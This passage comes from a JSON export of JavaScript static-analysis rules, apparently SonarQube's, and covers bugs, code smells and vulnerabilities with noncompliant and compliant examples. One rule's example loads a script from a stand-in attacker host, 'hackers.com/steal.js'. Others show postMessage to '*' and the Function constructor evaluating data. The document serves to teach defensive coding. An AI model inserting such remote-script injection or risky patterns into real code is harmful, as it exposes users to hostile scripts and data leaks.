Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(dividend, divisor); \/\/ Noncompliant; operation succeeds, but result is unexpected\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(divisor, dividend);\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i--) { \/\/ Noncompliant;\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i++) {\n \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var i; \/\/ Noncompliant; should be declared in if-block\n if (a > b) {\n i = a;\n console.log(i);\n var x = a - b; \/\/ Noncompliant; should be declared outside if-block\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var x = a - b;\n\n if (a > b) {\n var i = a;\n console.log(i);\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n URIError <\/li>\n <li> Numbers and dates - Number, Math, Date <\/li>\n <li> Text processing - String, RegExp <\/li>\n <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n Float64Array <\/li>\n <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n <li> Control abstraction objects - Promise <\/li>\n <li> Reflection - Reflect, Proxy <\/li>\n <li> Internationalization - Intl <\/li>\n <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\"); \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n return 42; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n 'first name': 'Bob', \/\/ Noncompliant\n 'birth date': new Date() \/\/ Noncompliant\n },\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n firstName: 'Bob',\n birthDate: new Date()\n },\n });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n doSomething();\n} else {\n doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n doSomething();\n}\n\nif (b && a) { \/\/ Noncompliant; \"a\" is always \"true\"\n doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n doSomething();\n}\n\nif (b) {\n doSomething();\n}\n\nif (c) {\n doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n var s = document.createElement(\"script\");\n s.setAttribute(\"type\", \"text\/javascript\");\n s.setAttribute(\"src\", url);\n document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\") \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) { \/\/ Noncompliant; always false\n console.log(\"a is not a number\"); \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. Any checks which look for\nvalues >0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") > 0) { \/\/ Noncompliant\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > 0 { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") >= 0) {\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > -1) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\"); \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\"); \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n <p>Beginning your selector with an ID is always best.<\/p>\n <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num; \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num; \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n <li> <code>.andSelf()<\/code> <\/li>\n <li> <code>.context<\/code> <\/li>\n <li> <code>.die()<\/code> <\/li>\n <li> <code>.error()<\/code> <\/li>\n <li> <code>jQuery.boxModel<\/code> <\/li>\n <li> <code>jQuery.browser<\/code> <\/li>\n <li> <code>jQuery.sub()<\/code> <\/li>\n <li> <code>jQuery.support<\/code> <\/li>\n <li> <code>.live()<\/code> <\/li>\n <li> <code>.load()<\/code> <\/li>\n <li> <code>.selector<\/code> <\/li>\n <li> <code>.size()<\/code> <\/li>\n <li> <code>.toggle()<\/code> <\/li>\n <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. (It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. According to the specification:<\/p>\n<blockquote>\n Authors should not use the wildcard keyword (\n <code>*<\/code>) in the\n <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. <\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2]; \/\/ Noncompliant. myArray => ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1); \/\/ myArray => ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo(); \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo(); \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:<element_type><\/code> and <code>[type=\"<element_type>\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"<element_type>\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n <li> <code>:checkbox<\/code> <\/li>\n <li> <code>:file<\/code> <\/li>\n <li> <code>:image<\/code> <\/li>\n <li> <code>:password<\/code> <\/li>\n <li> <code>:radio<\/code> <\/li>\n <li> <code>:reset<\/code> <\/li>\n <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1; \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) { \/\/ Compliant\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n this.foo = 1;\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) {\n \/\/ ...\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass; \/\/ Noncompliant;\nvar obj2 = new MyClass(); \/\/ Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = function(){\n this.prop = 1;\n}\n\nvar obj1 = new someClass; \/\/ Compliant\nvar obj2 = new MyClass(); \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 1;\ndelete x; \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n x:1,\n foo: function(){\n ...\n }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n return p.gender==Person.MALE?\"Mr. \":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName(); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) { \/\/ Noncompliant\n console.log(i);\n}\n\ngo(); \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo(); \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. <\/p>\n<p>But just because you can, that does't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that an a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n let args = Array.prototype.slice.call(arguments); \/\/ Noncompliant\n return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n if (!isTrue) {\n for (var arg of args) {\n ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n if (!isTrue) {\n for (var value of values) {\n ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. <\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var a = obj1.a; \/\/ Noncompliant\n var b = obj1.b;\n\n var name = obj2.name; \/\/ ignored; there's only one extraction-and-assignment\n\n var zero = array[0]; \/\/ Noncompliant\n var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var {a, b} = obj1;\n\n var {name} = obj2; \/\/ this syntax works because var name and property name are the same\n\n var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) { \/\/ Noncompliant\n let b = 12;\n if (a) {\n return b;\n }\n return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj = new Function(\"return \" + data)(); \/\/ 